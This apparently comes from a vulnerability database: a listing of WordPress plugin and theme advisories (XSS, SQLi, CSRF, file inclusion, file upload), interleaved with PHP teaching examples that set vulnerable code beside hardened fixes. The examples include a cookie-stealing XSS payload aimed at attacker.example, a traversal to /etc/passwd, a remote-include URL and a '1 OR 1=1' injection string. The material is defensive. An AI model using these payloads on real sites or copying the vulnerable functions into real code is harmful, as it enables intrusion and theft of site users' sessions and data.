45924 matches found
WordPress AI Contact Us Form Plugin <= 1.0 is vulnerable to Cross Site Scripting (XSS)
Software AI Contact Us Form Type Plugin Vulnerable versions <= 1.0 Fixed in N/A OWASP Top 10 A7: Cross-Site Scripting (XSS) Classification Cross Site Scripting (XSS) CVE CVE-2023-24386 Patch priority Low CVSS severity Low 5.9 Developer PSID 673ba1e565e3 Credits Aswin Balaji Required...
WordPress FV Flowplayer Video Player plugin <= 7.5.18.727 - Authenticated Persistent Cross-Site Scripting (XSS) vulnerability
Authenticated Persistent Cross-Site Scripting (XSS) vulnerability discovered by Ex.Mi (Patchstack) in WordPress FV Flowplayer Video Player plugin versions <= 7.5.18.727. Solution Update the WordPress FV Flowplayer Video Player plugin to the latest available version, at least 7.5.19.727...
WordPress SEO URL Redirects LlamasApps plugin <= 2.0 - Sensitive Information Disclosure vulnerability
Sensitive Information Disclosure vulnerability discovered in WordPress SEO URL Redirects LlamasApps plugin versions <= 2.0. Solution No patched version available...
WordPress Saan World Clock Plugin <= 1.8 is vulnerable to Cross Site Scripting (XSS)
Software Saan World Clock Type Plugin Vulnerable versions <= 1.8 Fixed in N/A OWASP Top 10 A7: Cross-Site Scripting (XSS) Classification Cross Site Scripting (XSS) CVE CVE-2023-0145 Patch priority Medium CVSS severity Medium 6.5 Developer PSID cb720ac68691 Credits Lana Codes Required...
WordPress WP ALL Export Pro plugin <= 1.7.8 - Authenticated Code Injection vulnerability
Authenticated Code Injection vulnerability discovered by Sanjay Das in WordPress WP ALL Export Pro plugin versions <= 1.7.8. Solution Update the WordPress WP ALL Export Pro plugin to the latest available version, at least 1.7.9...
WordPress Conversios.io plugin <= 4.6.1 - SQL Injection (SQLi) vulnerability
SQL Injection (SQLi) vulnerability discovered by JrXnm in WordPress Conversios.io plugin versions <= 4.6.1. Solution Update the WordPress Conversios.io plugin to the latest available version, at least 4.6.2...
WordPress WS Form LITE plugin <= 1.8.175 - Stored Cross-Site Scripting (XSS) vulnerability
Stored Cross-Site Scripting (XSS) vulnerability discovered by Felipe Restrepo Rodriguez in WordPress WS Form LITE plugin versions <= 1.8.175. Solution Update the WordPress WS Form LITE plugin to the latest available version, at least 1.8.176...
WordPress Smart Slider 3 plugin <= 3.5.1.9 - PHP Object Injection vulnerability
PHP Object Injection vulnerability discovered by Nguyen Duy Quoc Khanh in WordPress Smart Slider 3 plugin versions <= 3.5.1.9. Solution Update the WordPress Smart Slider 3 plugin to the latest available version, at least 3.5.1.11...
WordPress NextCellent Gallery plugin <= 1.9.35 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered by lucy in WordPress NextCellent Gallery plugin versions <= 1.9.35. Solution Deactivate and delete. This plugin has been closed as of June 1, 2022 and is not available for download. This closure is temporary, pending a full...
WordPress Admin Menu Editor plugin <= 1.0.4 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by Ran Crane in WordPress Admin Menu Editor plugin versions <= 1.0.4. Solution Deactivate and delete. This plugin has been closed as of March 9, 2022 and is not available for download. This closure is temporary, pending a full review...
WordPress Photo Gallery by 10Web plugin <= 1.6.2 - Unauthenticated SQL Injection (SQLi) vulnerability
Unauthenticated SQL Injection (SQLi) vulnerability discovered by JrXnm in WordPress Photo Gallery by 10Web plugin versions <= 1.6.2. Solution Update the WordPress Photo Gallery by 10Web plugin to the latest available version, at least 1.6.3...
WordPress WP Statistics plugin <= 13.1.5 - Unauthenticated Blind SQL Injection (SQLi) vulnerability
Unauthenticated Blind SQL Injection (SQLi) vulnerability via IP discovered by Muhammad Zeeshan (Xib3rR4dAr) in WordPress WP Statistics plugin versions <= 13.1.5. Solution Update the WordPress WP Statistics plugin to the latest available version, at least 13.1.6...
WordPress <= 5.8.2 - Authenticated Object Injection in Multisites
Authenticated Object Injection in Multisites discovered by Simon Scannell (SonarSource) in WordPress versions <= 5.8.2. Solution Update WordPress to the latest available version, at least 5.8.3...
WordPress Wordfence Plugin <= 3.8.6 - Stored XSS
This plugin is prone to a stored cross-site scripting vulnerability in lib/IPTraf.php: the User-Agent header is recorded and later rendered without escaping. Solution Update the plugin...
WordPress National Weather Service Alerts plugin <= 1.3.5 - Local File Inclusion Vulnerability
Local File Inclusion vulnerability discovered by Nguyen Xuan Chien in WordPress National Weather Service Alerts plugin versions <= 1.3.5...
WordPress Modern Events Calendar Lite plugin <= 6.1.0 - Unauthenticated Blind SQL Injection (SQLi) vulnerability
Unauthenticated Blind SQL Injection (SQLi) vulnerability discovered by Krzysztof Zając in WordPress Modern Events Calendar Lite plugin versions <= 6.1.0. Solution Update the WordPress Modern Events Calendar Lite plugin to the latest available version, at least 6.1.5...
WordPress Glass plugin <= 1.3.2 - Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF) vulnerability leading to Stored Cross-Site Scripting (XSS) discovered by ABISHEIK M in WordPress Glass plugin versions <= 1.3.2. Solution This plugin has been closed as of May 26, 2021 and is not available for download. This closure is temporary, pending a full review...
WordPress Any Font Plugin <= 2.2.3 - XSS
A vulnerability in mceanyfont/dialog.php allows attackers to inject arbitrary web script or HTML via the "text" parameter. Solution Update the plugin...
WordPress Web Minimalist Theme 1.1 - Cross Site Scripting
The WordPress Web Minimalist theme ("index.php") is prone to a cross-site scripting vulnerability: it fails to properly sanitize user-supplied input. An attacker may execute arbitrary script code in the browser of a user in the context of the affected site. In this way the attacker can ste...
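The three XSS entries above (Wordfence's User-Agent header stored in lib/IPTraf.php, Any Font's "text" parameter, Web Minimalist's index.php) share one root cause: a request value is written into HTML without escaping for the context it lands in. The following PHP is an added example, not code from any of those plugins or themes; the request values, the visitor log and the rendering functions are constructed here to show the stored and the reflected shape side by side with the hardened rendering.

```php
<?php
// Added example in PHP, not code from the Wordfence, Any Font or Web Minimalist
// entries. A request header stored and rendered later (the User-Agent case) and
// a request parameter echoed straight back (the "text" case), beside the
// hardened rendering. Request values and the visitor log are constructed.
declare(strict_types=1);

// Stand-ins for $_SERVER['HTTP_USER_AGENT'] and $_GET['text'] (constructed).
$request = [
    'user_agent' => 'Mozilla/5.0 <script>new Image().src="https://attacker.example/?c="+document.cookie</script>',
    'text'       => '"><img src=x onerror=alert(1)>',
];

// "Stored" half: a traffic log that keeps the raw header, as a statistics
// plugin would, and renders it in the admin dashboard later.
function logVisit(array &$log, string $userAgent): void {
    $log[] = ['ts' => '2024-01-01T00:00:00Z', 'ua' => $userAgent];
}

// Vulnerable: untrusted strings interpolated into HTML as-is.
function renderVulnerable(array $log, string $text): string {
    $html = "<p>You typed: {$text}</p>\n";
    foreach ($log as $row) {
        $html .= "<tr><td>{$row['ts']}</td><td>{$row['ua']}</td></tr>\n";
    }
    return $html;
}

// Hardened: every untrusted value is escaped for the HTML text context it lands
// in. In WordPress the equivalent is esc_html(); inside attributes use
// esc_attr() and for href/src values esc_url(), because each context differs.
function esc(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderHardened(array $log, string $text): string {
    $html = '<p>You typed: ' . esc($text) . "</p>\n";
    foreach ($log as $row) {
        $html .= '<tr><td>' . esc($row['ts']) . '</td><td>' . esc($row['ua']) . "</td></tr>\n";
    }
    return $html;
}

// True when one of the injected tags survived verbatim, i.e. the payload would run.
function containsRawTag(string $html): bool {
    return strpos($html, '<script>') !== false || strpos($html, '<img ') !== false;
}

$visitLog = [];
logVisit($visitLog, $request['user_agent']);

echo "vulnerable output executes payload: ";
var_dump(containsRawTag(renderVulnerable($visitLog, $request['text'])));
echo "hardened output executes payload: ";
var_dump(containsRawTag(renderHardened($visitLog, $request['text'])));
echo renderHardened($visitLog, $request['text']);
```

Note that input sanitisation at storage time (sanitize_text_field() in WordPress) is a useful second layer but not a substitute: the header is still attacker-controlled data, and the escaping that prevents the script from running belongs at the output, chosen per context.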
WordPress WordPress Automatic plugin <= 3.115.0 - Authenticated (Author+) Arbitrary File Upload vulnerability
Authenticated (Author+) Arbitrary File Upload vulnerability discovered by Trương Hữu Phúc (truonghuuphuc) in WordPress Automatic plugin versions <= 3.115.0...
WordPress Bulk Edit Categories and Tags – Create Thousands Quickly on the Editor Plugin < 1.7.6 is vulnerable to Cross Site Scripting (XSS)
Software Bulk Edit Categories and Tags – Create Thousands Quickly on the Editor Type Plugin Vulnerable versions < 1.7.6 Fixed in 1.7.6 OWASP Top 10 A3: Injection Classification Cross Site Scripting (XSS) CVE CVE-2023-33999 Patch priority Medium CVSS severity Medium 7.1 Developer PSID...
WordPress Oceanwp sticky header plugin <= 1.0.8 - Cross-Site Request Forgery (CSRF) vulnerability
Cross-Site Request Forgery (CSRF) vulnerability leading to a header style change discovered by Rasi Afeef (Patchstack Alliance) in WordPress Oceanwp sticky header plugin versions <= 1.0.8. Solution No patched version is available. No reply from the vendor...
WordPress Real Cookie Banner plugin <= 2.14.1 - Settings Reset via Cross-Site Request Forgery (CSRF) vulnerability
Settings Reset via Cross-Site Request Forgery (CSRF) vulnerability discovered by Krzysztof Zając in WordPress Real Cookie Banner plugin versions <= 2.14.1. Solution Update the WordPress Real Cookie Banner plugin to the latest available version, at least 2.14.2...
WordPress WPQA premium plugin < 5.4 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered by Veshraj Ghimire in WordPress WPQA premium plugin versions < 5.4. Solution Update the WordPress WPQA premium plugin to the latest available version, at least 5.4...
WordPress Brandfolder Plugin 3.0 - Remote and Local File Inclusion
The Brandfolder plugin is prone to remote and local file inclusion. It allows an attacker to host a "wp-load.php" file on a server of their choosing and disable it there by using ".htaccess". Solution Upgrade the plugin...
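Both file inclusion entries above (National Weather Service Alerts, Brandfolder) come down to an include whose path is assembled from a request parameter. The PHP below is an added example, not code from either plugin: it shows the vulnerable path construction beside an allow-listed version that also verifies the resolved path stays under the plugin directory. The template names and the directory it creates under the system temp dir are hypothetical and constructed so the example runs stand-alone.

```php
<?php
// Added example in PHP, not code from the National Weather Service Alerts or
// Brandfolder plugins. The template names and the temp directory are constructed.
declare(strict_types=1);

// Vulnerable: the request parameter selects the file. "../../wp-config.php"
// reads a local file; with allow_url_include on, "http://attacker.example/x"
// would fetch and execute remote code. The path is returned rather than
// included so the example runs standalone.
function templatePathVulnerable(string $baseDir, string $name): string {
    return $baseDir . '/' . $name . '.php';
}

// Hardened: the parameter is matched against a fixed list of template names,
// and the resolved path is checked to still sit under the base directory.
const ALLOWED_TEMPLATES = ['alert-list', 'alert-single', 'alert-widget'];

function templatePathHardened(string $baseDir, string $name): ?string {
    if (!in_array($name, ALLOWED_TEMPLATES, true)) {
        return null;                       // unknown name: refuse instead of guessing
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $name . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;                       // missing file, or it resolved outside $base
    }
    return $path;
}

// Constructed plugin directory holding the three legitimate templates.
$baseDir = sys_get_temp_dir() . '/nws-templates-' . getmypid();
mkdir($baseDir, 0700);
foreach (ALLOWED_TEMPLATES as $t) {
    file_put_contents("$baseDir/$t.php", "<?php // template $t\n");
}

// Constructed inputs: one legitimate, one traversal, one remote URL, one
// traversal that still ends on a legitimate name.
$inputs = ['alert-list', '../../../../etc/passwd', 'http://attacker.example/shell', 'alert-list/../alert-single'];
foreach ($inputs as $in) {
    $v = templatePathVulnerable($baseDir, $in);
    $h = templatePathHardened($baseDir, $in);
    printf("%-32s vulnerable -> %s\n%-32s hardened   -> %s\n", $in, $v, '', $h ?? 'REJECTED');
}

// Remove the constructed directory.
foreach (ALLOWED_TEMPLATES as $t) { unlink("$baseDir/$t.php"); }
rmdir($baseDir);
```

The allow-list is the real control; the realpath() comparison is a second check that catches a mistake in the list (a name containing a separator, a symlink in the directory) rather than a replacement for it.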
WordPress Sahifa Theme <= 2.4.0 - Multiple Vulnerabilities
This theme is prone to cross-site request forgery and full path disclosure vulnerabilities. Through the CSRF, the site's settings can be overwritten; through the full path disclosure, attackers can obtain sensitive information via an invalid upload request. Solution Update the theme...
WordPress TimThumb Plugin 1.32 - Remote Code Execution
The TimThumb script is prone to a remote code execution vulnerability because it does not properly validate remotely cached files. Solution Update this plugin to the latest version or delete the "timthumb" file...
WordPress Ajax Load More plugin <= 5.5.3 - PHAR Deserialization via Cross-Site Request Forgery (CSRF) vulnerability
PHAR Deserialization via Cross-Site Request Forgery (CSRF) vulnerability discovered by Rasoul Jahanshahi in WordPress Ajax Load More plugin versions <= 5.5.3. Solution Update the WordPress Ajax Load More plugin to the latest available version, at least 5.5.4...
WordPress Ad Invalid Click Protector (AICP) plugin <= 1.2.5.2 - Cross-Site Request Forgery (CSRF) vulnerability
Banned users deletion via Cross-Site Request Forgery (CSRF) vulnerability in WordPress Ad Invalid Click Protector (AICP) plugin versions <= 1.2.5.2. Solution Update the WordPress Ad Invalid Click Protector (AICP) plugin to the latest available version, at least 1.2.6...
WordPress Enlighten theme <= 1.3.5 - Arbitrary File Upload vulnerability
Arbitrary File Upload vulnerability discovered by Lenon Leite (Patchstack Red Team project) in WordPress Enlighten theme versions <= 1.3.5. This theme uses a vulnerable piece of code related to a previously identified vulnerability, CVE-2021-39317. Solution Deactivate and delete. The vendor ignores t...
WordPress Smart Google Code Inserter plugin <=3.4 - SQL injection (SQLi) vulnerability
SQL injection (SQLi) vulnerability found by Benjamin Lim in WordPress Smart Google Code Inserter plugin versions <= 3.4. The saveGoogleAdWords function in smartgooglecode.php passes the unsanitized $_POST["oId"] input into an SQL query. Solution Update the WordPress Smart Google Code...
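The entry above names the mechanism precisely: a POST value concatenated into SQL text. The PHP below is an added example, not the Smart Google Code Inserter plugin's code; it reproduces that pattern against an in-memory SQLite table constructed here (the table name, column names and rows are hypothetical) and shows the parameterised form beside it. In a WordPress plugin the same fix is `$wpdb->query($wpdb->prepare("DELETE FROM {$wpdb->prefix}codes WHERE id = %d", $oId))`.

```php
<?php
// Added example in PHP, not the Smart Google Code Inserter plugin's code.
// Table, columns and rows are constructed for this example.
declare(strict_types=1);

function freshDb(): PDO {
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE codes (id INTEGER PRIMARY KEY, snippet TEXT NOT NULL)');
    $db->exec("INSERT INTO codes (snippet) VALUES ('adwords-a'), ('adwords-b'), ('analytics')");
    return $db;
}

function countRows(PDO $db): int {
    return (int) $db->query('SELECT COUNT(*) FROM codes')->fetchColumn();
}

// Vulnerable: $oId (standing in for $_POST['oId']) is pasted into the SQL text,
// so "1 OR 1=1" turns a single-row delete into a table wipe.
function deleteCodeVulnerable(PDO $db, string $oId): int {
    return $db->exec('DELETE FROM codes WHERE id = ' . $oId);
}

// Hardened: the id is cast and bound; the value can only ever be a number
// compared against the column, never part of the statement's structure.
function deleteCodeHardened(PDO $db, string $oId): int {
    $stmt = $db->prepare('DELETE FROM codes WHERE id = :id');
    $stmt->bindValue(':id', (int) $oId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

$payload = '1 OR 1=1';   // constructed attacker-controlled oId

$db = freshDb();
printf("vulnerable: %d rows before, deleted %d, %d left\n",
    countRows($db), deleteCodeVulnerable($db, $payload), countRows($db));

$db = freshDb();
printf("hardened:   %d rows before, deleted %d, %d left\n",
    countRows($db), deleteCodeHardened($db, $payload), countRows($db));
```

Casting alone (`(int) $_POST['oId']`) would also close this particular hole because the column is numeric; binding is the habit worth keeping because it also covers string columns, where a cast is not an option and `%s` in $wpdb->prepare() does the quoting.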
WordPress Pinterest Plugin <= 1.3.1 - Multiple Vulnerabilities
This plugin is prone to multiple unspecified vulnerabilities. Solution Update the plugin...
WordPress Booster for WooCommerce plugin <= 5.6.6 - Cross-Site Request Forgery (CSRF) vulnerability
Cross-Site Request Forgery (CSRF) vulnerability leading to Checkout Files Deletion discovered by WPScan in WordPress Booster for WooCommerce plugin versions <= 5.6.6. Solution Update the WordPress Booster for WooCommerce plugin to the latest available version, at least 5.6.7...
WordPress Popup Maker plugin <= 1.16.10 - Auth. Stored Cross-Site Scripting (XSS) vulnerability
Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered by c3p0d4y in WordPress Popup Maker plugin versions <= 1.16.10. Solution Update the WordPress Popup Maker plugin to the latest available version, at least 1.16.11...
WordPress Yoast SEO <= 17.2.1 - Unauthenticated Full Path Disclosure vulnerability
Unauthenticated Full Path Disclosure vulnerability discovered by Fariq Fadillah Gusti Insani in WordPress Yoast SEO versions <= 17.2.1. Solution Update WordPress Yoast SEO to the latest available version, at least 17.3...
WordPress File Manager plugin <= 6.8 - Unauthenticated Arbitrary File Upload leading to RCE vulnerability
Unauthenticated Arbitrary File Upload leading to RCE vulnerability found by w4fz5uck5 in WordPress File Manager plugin versions <= 6.8. Solution Update the WordPress File Manager plugin to the latest available version, at least 6.9...
WordPress Uncode Theme 1.3.1 - Arbitrary File Upload
The WordPress Uncode theme is prone to an arbitrary file upload vulnerability, which allows an attacker to upload arbitrary files to the affected server. Solution Update the theme...
WordPress Simple Backup Plugin <= 2.7.10 - Arbitrary File Download
This plugin is prone to an arbitrary file download vulnerability. Solution Update the plugin...
WordPress Custom Product Tabs for WooCommerce plugin <= 1.7.7 - Broken Access Control vulnerability leading to yikes-the-content-toggle option update
Broken Access Control vulnerability leading to yikes-the-content-toggle option update discovered by Tien Nguyen Anh (Patchstack Alliance) in WordPress Custom Product Tabs for WooCommerce plugin versions <= 1.7.7. Solution Update the WordPress Custom Product Tabs for WooCommerce plugin to the latest...
WordPress Popular Posts plugin <= 5.3.2 - Authenticated Code Injection vulnerability leading to Remote Code Execution (RCE)
Authenticated Code Injection vulnerability leading to Remote Code Execution (RCE) discovered by NinTechNet in WordPress Popular Posts plugin versions <= 5.3.2. Solution Update the WordPress Popular Posts plugin to the latest available version, at least 5.3.3...
WordPress Really Simple Security Pro multisite Plugin 9.0.0-9.1.1.1 is vulnerable to Broken Authentication
Software Really Simple Security Pro multisite Type Plugin Vulnerable versions 9.0.0-9.1.1.1 Fixed in 9.1.2 OWASP Top 10 A1: Broken Access Control Classification Broken Authentication CVE CVE-2024-10924 Patch priority High CVSS severity High 9.8 Developer PSID 976349dfad8d Credits...
WordPress VR Calendar plugin < 2.3.1 - Unauthenticated Arbitrary Function Call vulnerability
Unauthenticated Arbitrary Function Call vulnerability discovered by Vinay Varma Mudunuri and Krishna Harsha Kondaveeti in WordPress VR Calendar plugin versions < 2.3.1. Solution Update the WordPress VR Calendar plugin to the latest available version, at least 2.3.1...
WordPress Database Backup for WordPress plugin <= 2.5.1 - Arbitrary Schedule Settings Update via Cross-Site Request Forgery (CSRF) vulnerability
Arbitrary Schedule Settings Update via Cross-Site Request Forgery (CSRF) vulnerability discovered by Daniel Ruf in WordPress Database Backup for WordPress plugin versions <= 2.5.1. Solution Update the WordPress Database Backup for WordPress plugin to the latest available version, at least 2.5.2...
WordPress Slideshow, Image Slider by 2J plugin <= 1.3.54 - Authenticated Reflected Cross-Site Scripting (XSS) vulnerability
Authenticated Reflected Cross-Site Scripting (XSS) vulnerability discovered by Tien Nguyen Anh aka vigov5 (Patchstack Alliance) in WordPress Slideshow, Image Slider by 2J plugin versions <= 1.3.54. Solution No patched version is available. No reply from the vendor...
WordPress Country Selector premium plugin <= 1.6.5 - Reflected Cross-Site Scripting (XSS) vulnerability
Reflected Cross-Site Scripting (XSS) vulnerability discovered in WordPress Country Selector premium plugin versions <= 1.6.5. Solution Update the WordPress Country Selector premium plugin to the latest available version, at least 1.6.6...
WordPress WPBakery Page Builder premium plugin <= 6.4 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
Authenticated Stored Cross-Site Scripting (XSS) vulnerability found by Chloe Chamberland in WordPress WPBakery Page Builder premium plugin versions <= 6.4. Solution Update the WordPress WPBakery Page Builder premium plugin to the latest available version, at least 6.4.1...
WordPress All-in-One WP Migration plugin <= 7.14 - Arbitrary Backup Download vulnerability
Arbitrary Backup Download vulnerability found by Kamil Vavra in WordPress All-in-One WP Migration plugin versions <= 7.14. Solution Update the WordPress All-in-One WP Migration plugin to the latest available version, at least 7.15...
WordPress is vulnerable to Path Traversal
Software WordPress Type WordPress Core Vulnerable versions < 6.5.5 Fixed in 6.5.5 OWASP Top 10 A1: Broken Access Control Classification Path Traversal CVE CVE-2024-32111 Patch priority Low CVSS severity Low 5 Developer PSID f2c038f99720 Credits Rafie Muhammad (Patchstack) Required...
WordPress Popup Builder plugin <= 4.1.0 - Cross-Site Request Forgery (CSRF) vulnerability leading to Popup Status Change
Cross-Site Request Forgery (CSRF) vulnerability leading to Popup Status Change discovered by BEE-K (Patchstack) in WordPress Popup Builder plugin versions <= 4.1.0. Solution Update the WordPress Popup Builder plugin to the latest available version, at least 4.1.1...
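Six entries on this page are plain CSRF (Oceanwp sticky header, Real Cookie Banner, Ad Invalid Click Protector, Booster for WooCommerce, Database Backup for WordPress, Popup Builder): a state-changing handler that accepts any request arriving with the victim's session cookie. The PHP below is an added example, not code from any of those plugins. It shows such a handler beside one that also demands a nonce bound to the action and the session; the nonce scheme is a stand-alone analogue of WordPress nonces, not their implementation, and the session secret, action names and option store are hypothetical. In a real plugin the guard is wp_nonce_field('popup_status') in the form and check_admin_referer('popup_status') (or check_ajax_referer()) in the handler, together with a current_user_can() capability check.

```php
<?php
// Added example in PHP, not code from any plugin listed on this page. The
// session secret, action names, option store and requests are constructed.
declare(strict_types=1);

const NONCE_TICK = 12 * 3600;   // 12-hour validity windows, as WordPress uses

// Per-login secret; WordPress derives its equivalent from the session token.
$sessionSecret = bin2hex(random_bytes(32));

function createNonce(string $secret, string $action, int $now): string {
    return hash_hmac('sha256', $action . '|' . intdiv($now, NONCE_TICK), $secret);
}

// Accept the current tick and the previous one so a form opened shortly before
// the boundary still submits; compare in constant time.
function verifyNonce(string $secret, string $action, string $nonce, int $now): bool {
    $tick = intdiv($now, NONCE_TICK);
    foreach ([$tick, $tick - 1] as $t) {
        if (hash_equals(hash_hmac('sha256', $action . '|' . $t, $secret), $nonce)) {
            return true;
        }
    }
    return false;
}

// Vulnerable: a form on any site that auto-submits to this handler rides on the
// victim's cookies and flips the option.
function setPopupStatusVulnerable(array &$options, array $post): void {
    $options['popup_enabled'] = ($post['status'] ?? '') === 'on';
}

// Hardened: the request must carry a nonce minted for this action in this session.
function setPopupStatusHardened(array &$options, array $post, string $secret, int $now): bool {
    if (!verifyNonce($secret, 'popup_status', (string) ($post['_nonce'] ?? ''), $now)) {
        return false;   // WordPress would wp_die() here
    }
    $options['popup_enabled'] = ($post['status'] ?? '') === 'on';
    return true;
}

$now = time();
$options = ['popup_enabled' => true];

// Constructed requests: a forged one (the attacker knows the action name but
// not the secret), one minted for a different action, and the plugin's own form.
$requests = [
    'forged'       => ['status' => 'off', '_nonce' => createNonce('attacker-guess', 'popup_status', $now)],
    'wrong-action' => ['status' => 'off', '_nonce' => createNonce($sessionSecret, 'popup_delete', $now)],
    'legitimate'   => ['status' => 'off', '_nonce' => createNonce($sessionSecret, 'popup_status', $now)],
];

setPopupStatusVulnerable($options, $requests['forged']);
printf("vulnerable handler, forged request: popup_enabled=%s\n", var_export($options['popup_enabled'], true));

foreach ($requests as $label => $post) {
    $options['popup_enabled'] = true;
    $ok = setPopupStatusHardened($options, $post, $sessionSecret, $now);
    printf("hardened handler, %-13s accepted=%-5s popup_enabled=%s\n",
        $label . ':', var_export($ok, true), var_export($options['popup_enabled'], true));
}
```

Binding the nonce to the action is what makes the "wrong-action" case fail: a token leaked from a harmless form cannot be replayed against a destructive handler. The nonce is not an authorisation check, which is why the capability check still has to sit next to it.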
WordPress GTM4WP plugin <= 1.15.1 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability
Authenticated Stored Cross-Site Scripting (XSS) vulnerability discovered by Muhammad Zeeshan (Xib3rR4dAr) in WordPress GTM4WP plugin versions <= 1.15.1. Solution Update the WordPress GTM4WP plugin to the latest available version, at least 1.15.2...